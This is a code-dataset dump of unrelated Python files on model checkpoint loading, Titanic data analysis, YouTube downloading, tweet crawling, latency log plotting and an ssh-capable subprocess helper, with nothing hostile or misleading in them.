print((\"=> loading checkpoint '{:s}'\".format(resume_checkpoint)))\n checkpoint = torch.load(resume_checkpoint)\n\n # print(\"=> Weigths in the checkpoints:\")\n # print([k for k, v in list(checkpoint.items())])\n\n # remove the module in the parallel model\n if 'module.' 
in list(checkpoint.items())[0][0]:\n pretrained_dict = {'.'.join(k.split('.')[1:]): v for k, v in list(checkpoint.items())}\n checkpoint = pretrained_dict\n\n \n #resume_scope = self.cfg.TRAIN.RESUME_SCOPE\n # extract the weights based on the resume scope\n if resume_scope != '':\n pretrained_dict = {}\n #print(list(checkpoint.items))\n for k, v in list(checkpoint.items()):\n #print(k,'***start***')\n for resume_key in resume_scope.split(','):\n if resume_key in k:\n pretrained_dict[k] = v\n #print(pretrained_dict[k])\n break\n # else:\n # print(k)\n # print('***end***')\n \n checkpoint = pretrained_dict\n\n pretrained_dict = {k: v for k, v in checkpoint.items() if k in model.state_dict()}\n # print(\"=> Resume weigths:\")\n # print([k for k, v in list(pretrained_dict.items())])\n\n checkpoint = model.state_dict()\n\n unresume_dict = set(checkpoint)-set(pretrained_dict)\n if len(unresume_dict) != 0:\n print(\"=> UNResume weights:\")\n print(unresume_dict)\n\n checkpoint.update(pretrained_dict)\n model.load_state_dict(checkpoint)\n\n return model\n\n\ndef find_previous(output_dir):\n if not os.path.exists(os.path.join(output_dir, 'checkpoint_list.txt')):\n return False\n with open(os.path.join(output_dir, 'checkpoint_list.txt'), 'r') as f:\n lineList = f.readlines()\n epoches, resume_checkpoints = [list() for _ in range(2)]\n for line in lineList:\n epoch = int(line[line.find('epoch ') + len('epoch '): line.find(':')])\n checkpoint = line[line.find(':') + 2:-1]\n epoches.append(epoch)\n resume_checkpoints.append(checkpoint)\n return epoches, resume_checkpoints\n\ndef weights_init(m):\n for key in m.state_dict():\n if key.split('.')[-1] == 'weight':\n if 'conv' in key:\n nn.init.kaiming_normal_(m.state_dict()[key], mode='fan_out')\n if 'bn' in key:\n m.state_dict()[key][...] = 1\n elif key.split('.')[-1] == 'bias':\n m.state_dict()[key][...] 
= 0\n\n\n\ndef trainable_param(model,trainable_scope):\n for param in model.parameters():\n param.requires_grad = False\n\n trainable_param = []\n for module in trainable_scope.split(','):\n if hasattr(model, module):\n # print(getattr(self.model, module))\n for param in getattr(model, module).parameters():\n param.requires_grad = True\n trainable_param.extend(getattr(model, module).parameters())\n\n return trainable_param\n\n\ndef configure_optimizer(trainable_param, cfg):\n if cfg.OPTIMIZER == 'sgd':\n optimizer = optim.SGD(trainable_param, lr=cfg.LEARNING_RATE,\n momentum=cfg.MOMENTUM, weight_decay=cfg.WEIGHT_DECAY)\n elif cfg.OPTIMIZER == 'rmsprop':\n optimizer = optim.RMSprop(trainable_param, lr=cfg.LEARNING_RATE,\n momentum=cfg.MOMENTUM, alpha=cfg.MOMENTUM_2, eps=cfg.EPS, weight_decay=cfg.WEIGHT_DECAY)\n elif cfg.OPTIMIZER == 'adam':\n optimizer = optim.Adam(trainable_param, lr=cfg.LEARNING_RATE,\n betas=(cfg.MOMENTUM, cfg.MOMENTUM_2), eps=cfg.EPS, weight_decay=cfg.WEIGHT_DECAY)\n else:\n raise AssertionError('optimizer can not be recognized.')\n return optimizer\n\n\n\ndef configure_lr_scheduler(optimizer, cfg):\n if cfg.SCHEDULER == 'step':\n scheduler = lr_scheduler.StepLR(optimizer, step_size=cfg.STEPS[0], gamma=cfg.GAMMA)\n elif cfg.SCHEDULER == 'multi_step':\n scheduler = lr_scheduler.MultiStepLR(optimizer, milestones=cfg.STEPS, gamma=cfg.GAMMA)\n elif cfg.SCHEDULER == 'exponential':\n scheduler = lr_scheduler.ExponentialLR(optimizer, gamma=cfg.GAMMA)\n elif cfg.SCHEDULER == 'SGDR':\n scheduler = lr_scheduler.CosineAnnealingLR(optimizer, T_max=cfg.MAX_EPOCHS)\n else:\n raise AssertionError('scheduler can not be recognized.')\n return scheduler\n\n","sub_path":"module/model/ssd_lite.py","file_name":"ssd_lite.py","file_ext":"py","file_size_in_byte":11882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"190557578","text":"#-*- coding: utf-8 -*-\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nimport sys,os\nsys.path.append(os.path.dirname(__file__))\n\nfrom titanic_preprocess import get_binned_data\n\ndef plot_train_test_histogram(col_name, titanic_all, bins=10):\n '''\n Plot histograms of the training data and the test data\n\n Parameters\n ----------\n col_name : str\n Name of the column to plot the histogram for\n titanic_all : pd.DataFrame\n The full dataset\n bins : int\n Number of histogram bins\n '''\n \n # bin the values\n all_values = titanic_all[col_name]\n all_binned_values = get_binned_data(all_values, bins)\n \n train_flg = titanic_all['Type'] == 'train'\n train_binned_values = all_binned_values[train_flg]\n \n test_flg = titanic_all['Type'] == 'test'\n test_binned_values = all_binned_values[test_flg]\n \n # count records per category\n train_plot_data = pd.DataFrame({'train': train_binned_values.value_counts().sort_index() / sum(train_flg)})\n test_plot_data = pd.DataFrame({'test': test_binned_values.value_counts().sort_index() / sum(test_flg)})\n \n all_plot_data = pd.DataFrame({'all': all_binned_values.value_counts().sort_index()})\n \n # align with the index of the all-data categories\n train_plot_data = pd.concat([all_plot_data, train_plot_data], axis=1, sort=True).fillna(0)['train']\n test_plot_data = pd.concat([all_plot_data, test_plot_data], axis=1, sort=True).fillna(0)['test']\n \n x = np.arange(len(all_plot_data))\n w = 0.4\n \n plt.bar(x, train_plot_data, width=w, label='train', color='blue')\n plt.bar(x+w, test_plot_data, width=w, label='test', color='red')\n plt.xticks(x+w/2, all_plot_data.index, rotation=90)\n plt.legend(loc='best')\n\ndef plot_survival_rate(col_name, titanic_all, bins=10):\n '''\n Plot the survival rate for each value of the feature\n\n 
Parameters\n ----------\n col_name : str\n Name of the column to plot the histogram for\n titanic_all : pd.DataFrame\n The full dataset\n bins : int\n Number of histogram bins; ignored when the values are of type str\n '''\n \n # bin the values\n all_values = titanic_all[col_name]\n all_binned_values = get_binned_data(all_values, bins=bins)\n\n train_flg = titanic_all['Type'] == 'train'\n train_binned_values = all_binned_values[train_flg]\n\n # aggregate per category\n feature_df = pd.DataFrame({col_name : train_binned_values, 'Survived' : titanic_all['Survived']})\n survival_rate_df = feature_df.groupby(col_name).mean()\n count_df = feature_df.groupby(col_name).count()\n count_df.columns = ['count']\n \n category_survival_df = survival_rate_df.join(count_df)\n\n # plot the histogram and the survival rate\n fig = plt.figure()\n ax1 = fig.add_subplot(1, 1, 1)\n\n ax1.bar(category_survival_df.index, category_survival_df['count'], alpha=0.5)\n ax1.set_ylabel('count')\n ax1.set_xticklabels(category_survival_df.index, rotation=90)\n\n ax2 = ax1.twinx()\n ax2.plot(category_survival_df.index, category_survival_df['Survived'], color='red', label='Survival')\n ax2.set_ylabel('Survival rate')\n ax2.set_ylim([0, 1.2])\n ax2.legend(loc='best')\n\n ax1.set_title('Survival rate by {col}'.format(col=col_name))\n ax1.set_xlabel(col_name)\n\n print(category_survival_df.to_string(formatters={'Survived': '{:.1%}'.format}))\n","sub_path":"titanic_package/titanic_plot.py","file_name":"titanic_plot.py","file_ext":"py","file_size_in_byte":3430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"162081923","text":"import re\nimport youtube_dl\nimport requests\nfrom bs4 import BeautifulSoup\n\n\ndef find_search_content(search):\n request = requests.get(\"https://www.youtube.com/results?search_query={}\".format(search))\n content = request.content\n soup = BeautifulSoup(content, \"html.parser\")\n return soup\n\n\ndef find_page_content(search):\n request = requests.get(\"https://www.youtube.com/results?{}\".format(search))\n content = request.content\n soup = BeautifulSoup(content, \"html.parser\")\n return soup\n\n\ndef find_video(soup, all_item, i=1):\n for element in soup.find_all('a', {\"rel\": \"spf-prefetch\"}):\n video_title = element.get('title')\n video_link = element.get('href')\n img_value = element.get('href').split(\"=\")[1]\n all_img = soup.find_all('img', {\"alt\": True, \"width\": True, \"height\": True, \"onload\": True, \"data-ytimg\": True})\n img = str(re.findall(\"https://i.ytimg.com/vi/{}/[\\S]+\".format(img_value), str(all_img))).strip(\"[\\\"\\']\")\n video_img = img.replace(\"&amp;\", \"&\")\n all_item['{}'.format(i)] = {\"title\": video_title, \"link\": \"https://www.youtube.com{}\".format(video_link),\n \"img\": video_img}\n i = i + 1\n return all_item\n\n\ndef video_time(soup, all_item, i=1):\n for time in soup.find_all('span', {\"class\": \"video-time\"}):\n all_item.get('{}'.format(i))['time'] = time.text\n i = i + 1\n return all_item\n\n\ndef every_video(soup):\n all_item = {}\n find_video(soup, all_item, i=1)\n video_time(soup, all_item, i=1)\n return all_item\n\n\ndef page_bar(soup):\n page = {}\n for page_value in soup.find_all('a', {\"class\": True, \"data-visibility-tracking\": True, \"data-sessionlink\": True,\n \"aria-label\": True, }):\n page['{}'.format(page_value.text)] = page_value.get('href')\n\n return page\n\n\ndef download_mp3(url):\n ydl_opts = {\n 'format': 'bestaudio/best',\n 'postprocessors': [{\n 'key': 'FFmpegExtractAudio',\n 'preferredcodec': 'mp3',\n 'preferredquality': '192',\n }],\n }\n with youtube_dl.YoutubeDL(ydl_opts) as ydl:\n 
ydl.download([url])\n    result = ydl.extract_info(\n        url,\n        download=False  # We just want to extract the info\n    )\n    if 'entries' in result:\n        # Can be a playlist or a list of videos\n        video = result['entries'][0]\n    else:\n        # Just a video\n        video = result\n\n    print(video)\n    video_url = video['url']\n    print(video_url)\n\n    request = requests.get(url)  # get url\n    cont = request.content  # content: figure out the encoding\n    soup = BeautifulSoup(cont, \"html.parser\")  # (content, HTML parser)\n\n    title = soup.findAll('meta' ,{\"property\": 'og:title'})[0]['content']\n    print('{}.mp3'.format(title))\n    print(type(title))\n    # title = str(title).format('\\n','').strip()\n    print(title)\n\n    return title\n\n\ndef download_mp4(url):\n    print(url)\n    ydl_opts = {'format': 'best'}\n    with youtube_dl.YoutubeDL(ydl_opts) as ydl:\n        ydl.download([url])\n","sub_path":"modles/item.py","file_name":"item.py","file_ext":"py","file_size_in_byte":3116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"438739778","text":"from pycse import bvp\nimport numpy as np\n\n# example from http://200.13.98.241/~martin/irq/tareas1/bvp_paper.pdf\n\n\ndef odefun(Y, x):\n    u, v, w, z, y = Y.T\n    dudx = 0.5 * u * (w - u) / v\n    dvdx = -0.5 * (w - u)\n    dwdx = (0.9 - 1000 * (w - y) - 0.5 * w * (w - u)) / z\n    dzdx = 0.5 * (w - u)\n    dydx = -100.0 * (y - w)\n    return np.column_stack([dudx, dvdx, dwdx, dzdx, dydx])\n\n\ndef bcfun(Y):\n    # u(0) = v(0) = w(0) = 1, z(0) = -10, w(1) = y(1)\n    ua, va, wa, za, ya = Y[0, :]\n    ub, vb, wb, zb, yb = Y[-1, :]\n    z1 = ua - 1\n    z2 = va - 1\n    z3 = wa - 1\n    z4 = za + 10\n    z5 = wb - yb\n    return [z1, z2, z3, z4, z5]\n\nx = np.linspace(0, 1)\n\n# initial guess\nux = x**0\nvx = x**0\nwx = -4.5 * x**2 + 8.91 * x + 1\nzx = -10 * x**0\nyx = -4.5*x**2 + 9*x + 0.91\n\nYinit = np.column_stack([ux, vx, wx, zx, yx])\n\nsol = bvp(odefun, bcfun, x, Yinit)\n\n\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nu = sol[:, 0]\nv = sol[:, 1]\nw = sol[:, 2]\nz = sol[:, 3]\ny = sol[:, 4]\n\nplt.plot(x, u, x, v, x, w, x, z + 10, x, y)\nplt.legend(['u', 'v', 'w', 'z', 'y'], loc='best')\nplt.show()\n","sub_path":"pycse/tests/test_bvp.py","file_name":"test_bvp.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"132995622","text":"\n\nfrom xai.brain.wordbase.verbs._twist import _TWIST\n\n#class header\nclass _TWISTS(_TWIST, ):\n\tdef __init__(self,): \n\t\t_TWIST.__init__(self)\n\t\tself.name = \"TWISTS\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"twist\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_twists.py","file_name":"_twists.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"436067159","text":"from Crawler.TweetCrawler import load_new_tweets, load_testset_accounts, insert_testset_tweets\nfrom Utility.Twitter import get_twitter_api\n\napi = get_twitter_api()\n\n#---------load-collected-accounts------------------------\n# # real\n# print(\"Load real news...\")\nload_new_tweets(api, fake=False)\n# # fake\n# print(\"Load fake news...\")\nload_new_tweets(api, fake=True)\n\n#---------load-testset-accounts--------------------------\n# load accounts from tweets of POLITIFACT category 'false' and 'pants on fire'\n# load_testset_accounts(api, fake=True)\n\n# load accounts from tweets of POLITIFACT category 'true'\n# load_testset_accounts(api, 
fake=False)\n\n#--------load-testset-tweets-----------------------------\n# insert fake news tweets\ninsert_testset_tweets(api, True)\n# insert real news tweets\ninsert_testset_tweets(api, False)\n","sub_path":"Crawler/CrawlerMain.py","file_name":"CrawlerMain.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"252555559","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport math\nimport os\nimport sys\nfrom enum import IntEnum\n\n\nclass LogColum(IntEnum):\n    ELAPSED = 0\n    NODE_NUM = 1\n    FUNCTION = 2\n    INFO = 3\n    INFO_ = 4\n    SERVICE_NAME = 5\n    SERVER_IP = 6\n    CLIENT_IP = 7\n    NOW_TIME = 8\n    SENT_TIME = 9\n    LATENCY = 10\n\n\ndef get_service_name(lines):\n    s_l = [s.strip() for s in lines]\n    service_names = []\n    for l in s_l:\n        line = l.split(' ')\n        service_names.append(line[LogColum.SERVICE_NAME])\n    return [x for x in set(service_names) if service_names.count(x) > 1]\n\n\ndef get_join_ips(lines, service_name):\n    s_l = [s.strip() for s in lines]\n    ips = []\n    for l in s_l:\n        line = l.split(' ')\n        if (service_name == line[LogColum.SERVICE_NAME]):\n            ips.append(line[LogColum.CLIENT_IP])\n    return [ip for ip in set(ips) if ips.count(ip) > 1]\n\n# log[lines][count]\n\n\ndef get_max_time(time):\n    return max(time)\n\n\ndef latency(time, latency):\n    order = 1_000_000\n    count = int(math.floor(get_max_time(time) / order))\n    summarized_time = np.arange(count)\n    summarized_latency = np.empty(count)\n    for i in summarized_time:\n        time_seconds = i * order\n        applicable_latency = latency[(\n            (time >= time_seconds) & (time < (time_seconds + order)))]\n        if (len(applicable_latency) == 0):\n            summarized_latency[i] = 0\n            continue\n        summarized_latency[i] = sum(\n            applicable_latency) / len(applicable_latency)\n    return (summarized_time, summarized_latency)\n\n\ndef variance(time, latency):\n    order = 1_000_000\n    count = int(math.floor(get_max_time(time) / order))\n    # aggregate into windows of `summary` seconds\n    summary = 1\n    summarized_time = np.arange(0, count, summary)\n    summarized_variance = np.empty(len(summarized_time))\n    for index, i in enumerate(summarized_time):\n        time_seconds = i * order\n        applicable_latency = latency[(\n            (time >= time_seconds) & (time < (time_seconds + (order*summary))))]\n        if (len(applicable_latency) == 0):\n            summarized_variance[index] = 0\n            continue\n        ave = sum(\n            applicable_latency) / len(applicable_latency)\n        squared_diff = [(i - ave) ** 2 for i in applicable_latency]\n        summarized_variance[index] = sum(squared_diff) / len(squared_diff)\n    return (summarized_time, summarized_variance)\n\n# Extract the log entries for the specified service\n\n\ndef get_log(log, service_name):\n    time = []\n    latency = []\n    for l in log:\n        if l[LogColum.SERVICE_NAME] == service_name:\n            time.append(float(l[LogColum.NOW_TIME]))\n            latency.append(float(l[LogColum.LATENCY]))\n    # latency is in microseconds, so convert it to milliseconds.\n    order = 1_000\n    return (np.array(time), np.array(latency)/order)\n\n\ndef get_log_with_ip(log, service_name, ip):\n    # return log_time[\"service_name\"][\"ip\"]\n    # return log_latency[\"service_name\"][\"ip\"]\n    time = []\n    latency = []\n    for l in log:\n        if l[LogColum.SERVICE_NAME] == service_name and l[LogColum.CLIENT_IP] == ip:\n            time.append(float(l[LogColum.NOW_TIME]))\n            latency.append(float(l[LogColum.LATENCY]))\n    # latency is in microseconds, so convert it to milliseconds.\n    order = 1_000\n    return (np.array(time), np.array(latency)/order)\n\n\ndef load_file(file_name):\n    path = 'arranged_log/'+file_name + '.log'\n    log_time = {}\n    log_latency = {}\n    service_names = []\n    with open(path) as f:\n        lines = f.readlines()\n        
service_names = get_service_name(lines)\n        log = [s.strip().split(' ') for s in lines]\n        for s in service_names:\n            log_time[s], log_latency[s] = get_log(log, s)\n    return service_names, log_time, log_latency\n\n\ndef load_file_with_ip(file_name):\n    path = 'arranged_log/'+file_name + '.log'\n    # log_time[\"service_name\"][\"ip\"]\n    # log_latency[\"service_name\"][\"ip\"]\n    log_time = {}\n    log_latency = {}\n    service_names = []\n    # join_ips[service_name] = []\n    join_ips = {}\n    with open(path) as f:\n        lines = f.readlines()\n        service_names = get_service_name(lines)\n        log = [s.strip().split(' ') for s in lines]\n        for s in service_names:\n            log_time[s] = {}\n            log_latency[s] = {}\n            join_ips[s] = get_join_ips(lines, s)\n            for ip in join_ips[s]:\n                log_time[s][ip], log_latency[s][ip] = get_log_with_ip(\n                    log, s, ip)\n    return service_names, join_ips, log_time, log_latency\n\n\ndef plot_std(file_name):\n    # log[servicename][count][0] = time\n    # log[servicename][count][1] = latency\n    service_names, log_time, log_latency = load_file(file_name)\n    color = {\n        \"serviceB\": \"#1f77b4\",\n        \"serviceA\": \"#ff7f0e\",\n    }\n    for service_name in service_names:\n        x, y = variance(log_time[service_name], log_latency[service_name])\n        y = y**0.5\n        # plot\n        plt.plot(x, y, label=service_name, color=color[service_name])\n\n    # show the legend\n    plt.legend()\n\n    plt.title('Change in Standard deviation of Latency')\n\n    # axis labels\n    plt.ylabel('Standard deviation of Latency (ms)')\n    plt.xlabel('elapsed time (s)')\n\n    makedir(file_name)\n    # save the plot (apply the settings)\n    plt.savefig('figure/'+file_name + '/std.png')\n    plt.clf()\n    return\n\n\ndef plot_latency(file_prefix):\n    pers = ['0', '20', '60', '100']\n    for per in pers:\n        file_name = file_prefix + '-' + per + 'per'\n        # log[servicename][count][0] = time\n        # log[servicename][count][1] = latency\n        service_names, log_time, log_latency = load_file(file_name)\n        for service_name in service_names:\n            x, y = latency(log_time[service_name], log_latency[service_name])\n            # plot\n            plt.plot(x, y, label=service_name+'-'+per + 'per')\n\n    # show the legend\n    plt.legend()\n\n    plt.title('Change in Latency')\n\n    # axis labels\n    plt.ylabel('Service RTT (ms)')\n    plt.xlabel('elapsed time (s)')\n\n    makedir(file_prefix)\n    # save the plot (apply the settings)\n    plt.savefig('figure/'+file_prefix + '/latency.png')\n    plt.clf()\n    return\n\n\ndef plot_lands(file_name):\n    service_names, log_time, log_latency = load_file(file_name)\n    color = {\n        \"latency\": \"#1f77b4\",\n        \"std\": \"#ff7f0e\",\n    }\n    for service_name in service_names:\n        std_x, std_y = variance(\n            log_time[service_name], log_latency[service_name])\n        std_y = std_y ** 0.5\n        x, y = latency(log_time[service_name], log_latency[service_name])\n        plt.plot(x, y, label=\"latency\",\n                 color=color[\"latency\"])\n        # plot\n        plt.plot(std_x, std_y, label=\"std\",\n                 color=color[\"std\"])\n        # show the legend\n        plt.legend()\n\n        plt.title('Change in Latency and Standard deviation of Latency')\n\n        # axis labels\n        plt.ylabel('Standard deviation of Latency and Latency (ms)')\n        plt.xlabel('elapsed time (s)')\n\n        makedir(file_name)\n        # save the plot (apply the settings)\n        plt.savefig('figure/'+file_name + '/' +\n                    service_name+'-latency-and-std.png')\n        plt.clf()\n    return\n\n\ndef plot_ip_latency(file_name):\n    # log_time[service_name][ip]\n    # log_latency[service_name][ip]\n    service_names, join_ips, log_time, log_latency = load_file_with_ip(\n        file_name)\n    for service_name in service_names:\n        for join_ip in join_ips[service_name]:\n            x, y = latency(log_time[service_name][join_ip],\n                           log_latency[service_name][join_ip])\n            plt.plot(x, y, label=join_ip)\n        # show the legend\n        plt.legend()\n\n        
plt.title('Change in Latency of ' + service_name)\n\n        # axis labels\n        plt.ylabel('Service RTT (ms)')\n        plt.xlabel('elapsed time (s)')\n\n        makedir(file_name)\n        # save the plot (apply the settings)\n        plt.savefig('figure/'+file_name + '/'+service_name+'_latency.png')\n        plt.clf()\n    return\n\n\ndef makedir(file_name):\n    os.makedirs('figure/'+file_name, exist_ok=True)\n    return\n\n\ndef arrange_log(file_name):\n    pers = ['0', '20', '40', '60', '80', '100']\n    for per in pers:\n        path = 'raw_log/'+file_name+'-'+per+'per.log'\n\n        latency_log = 'arranged_log/'+file_name + '-'+per+'per.log'\n        other_log = 'arranged_log/'+file_name + '-'+per+'per_others.log'\n\n        latency_file = open(latency_log, mode='w')\n        other_file = open(other_log, mode='w')\n\n        with open(path) as f:\n            lines = [s.strip() for s in f.readlines()]\n            for l in lines:\n                s_l = l.split(' ')\n                if len(s_l) < LogColum.INFO:\n                    other_file.write(l+'\\n')\n                    continue\n                if s_l[LogColum.FUNCTION] == \"KmdEchoClientApplication:HandleRead():\" and s_l[LogColum.INFO] == \"[INFO\":\n                    latency_file.write(l+'\\n')\n                else:\n                    other_file.write(l+'\\n')\n\n        latency_file.close()\n        other_file.close()\n\n\ndef get_file_name(file_path):\n    return os.path.splitext(os.path.basename(file_path))[0]\n\n\nargs = sys.argv\n# file_name example is usecase2\nfile_name = get_file_name(args[1])\n\narrange_log(file_name)\nplot_latency(file_name)\n","sub_path":"usecase2.py","file_name":"usecase2.py","file_ext":"py","file_size_in_byte":9310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"105606132","text":"#!/usr/bin/env python\n\n# The sum of the primes below 10 is 2 + 3 + 5 + 7 = 17.\n# Find the sum of all the primes below two million.\n\n##### a sieve table that crosses off every multiple would be a billion times faster and only eat a few kilobytes of RAM\n\n\ndef is_prime(n):\n    # trial-division primality test\n    if n < 2:\n        return False\n    for d in range(2, int(n ** 0.5) + 1):\n        if n % d == 0:\n            return False\n    return True\n\n\ndef get_result():\n    result = 0\n    for i in range(2, 2000000):\n        if i % 10000 == 0:\n            print(i)\n        if is_prime(i):\n            result += i\n    return result\n\n\nprint(get_result())\n","sub_path":"10.SumOfPrimes.py","file_name":"10.SumOfPrimes.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"6223422","text":"\"\"\" Writing my first randomforest code.\nAuthor : AstroDave\nDate : 23rd September, 2012\nplease see packages.python.org/milk/randomforests.html for more\n\n\"\"\" \n\nimport numpy as np\nimport csv as csv\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.ensemble import GradientBoostingClassifier\nfrom sklearn.ensemble import GradientBoostingRegressor\n\ncsv_file_object = csv.reader(open('train.csv', 'rb')) #Load in the training csv file\nheader = csv_file_object.next() #Skip the first line as it is a header\ntrain_data=[] #Create a variable called 'train_data'\nfor row in csv_file_object: #Skip through each row in the csv file\n    train_data.append(row) #adding each row to the data variable\ntrain_data = np.array(train_data) #Then convert from a list to an array\n\n#I need to convert all strings to integer classifiers:\n#Male = 1, female = 0:\ntrain_data[train_data[0::,3]=='male',3] = 1\ntrain_data[train_data[0::,3]=='female',3] = 0\n#embark c=0, s=1, q=2\ntrain_data[train_data[0::,10] =='C',10] = 0\ntrain_data[train_data[0::,10] =='S',10] = 1\ntrain_data[train_data[0::,10] =='Q',10] = 2\n\ntrain_data = np.delete(train_data,[2,7,9],1) #remove the name data, cabin and ticket\n#I need to do the same with the test data now so that the columns are in the same order\n#as the training 
data\n\n#I need to fill in the gaps of the data and make it complete.\n#So where there is no price, I will assume the price is the median of that class\n#Where there is no age I will give predicted value of age\nage_predict = train_data[0::,3]\nage_data = np.delete(train_data,[3],1)\nage_predict_paired = age_predict\nage_data_paired = age_data\n\n\nraw_input(\".\")\t\ngb_age = GradientBoostingRegressor().fit(age_data_paired,age_predict_paired)\nage_output = gb_age.predict(age_data)\nj = 0\nfor row in train_data:\n\tif(row[3]==''):\n\t\trow[3] = age_output[j]\n\tj += 1\n\n#All missing embarks just predict where they're coming from:\nem_predict = train_data[0::,7]\nem_data = np.delete(train_data,[7],1)\nem_predict_paired = em_predict\nem_data_paired = em_data\ni = 0\nfor row in em_predict_paired:\n\tif(row == ''):\n\t\tnp.delete(em_predict_paired[i,0::],1)\n\t\tnp.delete(em_data_paired[i,0::],1)\n\ti += 1\ngb_em = GradientBoostingRegressor().fit(em_data_paired,em_predict_paired)\nem_output = gb_em.predict(em_data)\nj = 0\nfor row in train_data:\n\tif(row[7]==''):\n\t\trow[7] = em_output[j]\n\tj += 1\n\n\ntest_file_object = csv.reader(open('test.csv', 'rb')) #Load in the test csv file\nheader = test_file_object.next() #Skip the first line as it is a header\ntest_data=[] #Create a variable called 'test_data'\nfor row in test_file_object: #Skip through each row in the csv file\n    test_data.append(row) #adding each row to the data variable\ntest_data = np.array(test_data) #Then convert from a list to an array\n\n#I need to convert all strings to integer classifiers:\n#Male = 1, female = 0:\ntest_data[test_data[0::,2]=='male',2] = 1\ntest_data[test_data[0::,2]=='female',2] = 0\n#embark c=0, s=1, q=2\ntest_data[test_data[0::,9] =='C',9] = 0 #Note this is not ideal; with an ordinal encoding 3 is not 3 times better than 1, nor is 2 twice as good as 1\ntest_data[test_data[0::,9] =='S',9] = 1\ntest_data[test_data[0::,9] =='Q',9] = 2\n\ntest_data = np.delete(test_data,[1,6,8],1) #remove the name data, cabin and ticket\n\n#All the ages with no data make the median of the data\nage_predict = test_data[0::,2]\nage_data = np.delete(test_data,[2],1)\nage_predict_paired = age_predict\nage_data_paired = age_data\ni = 0\nfor row in age_predict_paired:\n\tif(row == ''):\n\t\tnp.delete(age_predict_paired[i,0::],1)\n\t\tnp.delete(age_data_paired[i,0::],1)\n\ti += 1\ngb_age = GradientBoostingRegressor().fit(age_data_paired,age_predict_paired)\nage_output = gb_age.predict(age_data)\nj = 0\nfor row in test_data:\n\tif(row[2]==''):\n\t\trow[2] = age_output[j]\n\tj += 1\n\n#All missing embarks just predict where they're coming from:\nem_predict = test_data[0::,6]\nem_data = np.delete(test_data,[6],1)\nem_predict_paired = em_predict\nem_data_paired = em_data\ni = 0\nfor row in em_predict_paired:\n\tif(row == ''):\n\t\tnp.delete(em_predict_paired[i,0::],1)\n\t\tnp.delete(em_data_paired[i,0::],1)\n\ti += 1\ngb_em = GradientBoostingRegressor().fit(em_data_paired,em_predict_paired)\nem_output = gb_em.predict(em_data)\nj = 0\nfor row in test_data:\n\tif(row[6]==''):\n\t\trow[6] = em_output[j]\n\tj += 1\n\n\n\n\n#The data is now ready to go. 
So lets train then test!\n# Random FOREST\n# print 'Training '\n# forest = RandomForestClassifier(n_estimators=100)\n\n# forest = forest.fit(train_data[0::,1::],\\\n # train_data[0::,0])\n\n# print 'Predicting'\n# output = forest.predict(test_data)\n\ngb = GradientBoostingClassifier().fit(train_data[0::,1::],\\\n train_data[0::,0])\n\noutput = gb.predict(test_data)\n\t\t\t\t\t\nopen_file_object = csv.writer(open(\"myfirstgb.csv\", \"wb\"))\ntest_file_object = csv.reader(open('test.csv', 'rb')) #Load in the csv file\n\n\ntest_file_object.next()\ni = 0\nfor row in test_file_object:\n row.insert(0,output[i].astype(np.uint8))\n open_file_object.writerow(row)\n i += 1\n \n","sub_path":"src/Titanic/myfirstforest.py","file_name":"myfirstforest.py","file_ext":"py","file_size_in_byte":5041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"238123229","text":"import subprocess\nimport os\nfrom sykle.config import Config\n\n\nclass CancelException(Exception):\n pass\n\n\nclass NonZeroReturnCodeException(Exception):\n def __init__(self, process):\n self.process = process\n self.message = 'Process returned a non zero returncode'\n\n def __str__(self):\n return self.message\n\n\ndef call_subprocess(command, env=None, debug=False, target=None):\n \"\"\"\n This is a utility function that will spawn a subprocess that runs the\n command passed in to the command argument.\n\n Parameters:\n command (array[str]): the command to run as a subprocess\n env (dict): an optional dictionary of env vars to specify for command.\n values in env can references local environment variables.\n EX: env can be {'TEST': '$TEST_VAL'}\n debug (bool): if true, will output the command as given and the env\n vars used\n target (string): an optional ssh address specifying where to run the\n command (runs locally if not specified)\n NOTE: env vars will be interpolated based on LOCAL\n environment variables, not TARGET environment\n variables.\n \"\"\"\n if env:\n # NB: we want the entire environment specified here\n full_env = os.environ.copy()\n env = Config.interpolate_env_values(env, os.environ)\n full_env.update(env)\n\n cmd = command\n if target:\n if env:\n cmd = [\"{}={}\".format(k, v) for k, v in env.items()] + cmd\n cmd = ['ssh', '-o', 'StrictHostKeyChecking=no', target] + cmd\n\n full_command = ' '.join(cmd)\n\n if debug:\n print('--BEGIN COMMAND--')\n print('COMMAND:', full_command)\n print('--END COMMAND--')\n\n try:\n if env:\n p = subprocess.Popen(full_command, env=full_env, shell=True)\n else:\n p = subprocess.Popen(full_command, shell=True)\n p.wait()\n if p.returncode != 0:\n raise NonZeroReturnCodeException(process=p)\n except KeyboardInterrupt:\n p.wait()\n raise CancelException()\n","sub_path":"sykle/call_subprocess.py","file_name":"call_subprocess.py","file_ext":"py","file_size_in_byte":2179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"136039484","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: 